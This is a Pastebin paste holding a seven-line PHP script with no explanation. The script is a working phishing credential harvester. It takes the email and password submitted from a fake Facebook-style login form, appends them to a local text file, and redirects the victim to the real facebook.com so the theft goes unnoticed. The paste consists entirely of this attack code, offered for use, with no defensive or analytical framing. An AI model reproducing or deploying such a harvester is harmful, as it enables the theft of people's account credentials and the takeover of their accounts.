Advertisement
Guest User

Untitled

a guest
Feb 19th, 2012
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.18 KB | None | 0 0
  1. <?php
  2. header('Location:http://www.facebook.com ');
  3. $handle = fopen("hello.txt", "a");
  4. fwrite($handle, "Email:$_POST[email]\tPassword:$_POST[pass]");
  5. fclose($handle);
  6. exit;
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement